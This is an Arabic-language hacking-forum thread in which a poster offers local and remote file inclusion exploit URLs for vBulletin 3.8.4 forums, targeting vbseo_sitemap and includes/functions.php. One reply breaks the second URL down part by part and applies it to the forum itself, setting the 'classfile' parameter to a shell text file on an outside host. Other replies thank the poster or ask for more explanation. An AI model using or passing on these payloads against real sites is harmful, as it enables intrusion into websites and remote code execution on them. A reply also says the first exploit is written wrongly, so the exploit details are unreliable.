:: vBspiders Professional Network :: - ثغرة لـ منتديات vb version.3.8.4

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- - ثغرة لـ منتديات vb version.3.8.4 (http://www.vbspiders.com/vb/t33973.html)

ثغرة لـ منتديات vb version.3.8.4

السلام عليكم .. ثغرة لعيون منتديات العناكب .. خلال بحثي اليوم

حصلت ثغرة 2010 .. لـ منتديات vb' version 3.8.4

بعطيكم الاستغلال :)

############# ===[ Exploits ]=== ###########
# 1-
http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
# 2-
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
########################

smilies15

الشرح غير مفهوم ومبهم

الرجـــاء الشرح بالفيديو أو الصور

شكـــرا لك

[align=center]مشكور حبيبي على الثغره
لكن لو ممكن تشرحها على الاقل بالصور
و لك احلى تقييم
[/align]

[align=center]شكرا لك على الثغرة بارك الله فيك بلنسبة الاخوان هاكر مغربي & hacker's king
الاستغلال مايراد لة شرح طويل فهوا بسيط جدا راح اطبق على الاستغلال الثاني ولاستغلال الاول اخي غلط لانك ماواضع المتغير المصاب بعد علامة الاستفهام يرجى اعادة كتابة الاستغلال
الاستغلال الثاني : هو استغلال لثغرة الفايل انكود lfi

كود PHP:

http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?

http//www.site.com<<< الموقع المستهدف
[path]<<< المجلد الموجد فية المنتدى
includes/functions.php<<<مسار الملف المصاب
?<<<اشارة الاستفهام التي تكون قبل المتغير المصاب
classfile<<< المتغير المصاب
[shell].txt?<<<رابط الشل بصيغة txt وبعدة علامة الاستفهام

وراح اطبق لكم على المنتدى العناكب ههههه الاستغلال

كود PHP:

www.vbspiders.com/vb/includes/functions.php?classfile=http://www.e-linux-solutions.com/descargas/data.txt?

اتمنى ان تكونوا فهمت الاستغلال

تحياتي لكم [/align]

مشكور اخوي

اتمنى تكون فعاله

بس أضم صوتي لشباب

===============

تكرم اخونا فيروس القلعه على التوضيح

امممم
للأسف عصر الثغرات ديأقصد لوكال او ريموت فايل أنلكود ولى

بسبب اصدآر االبي آتش بي الجديد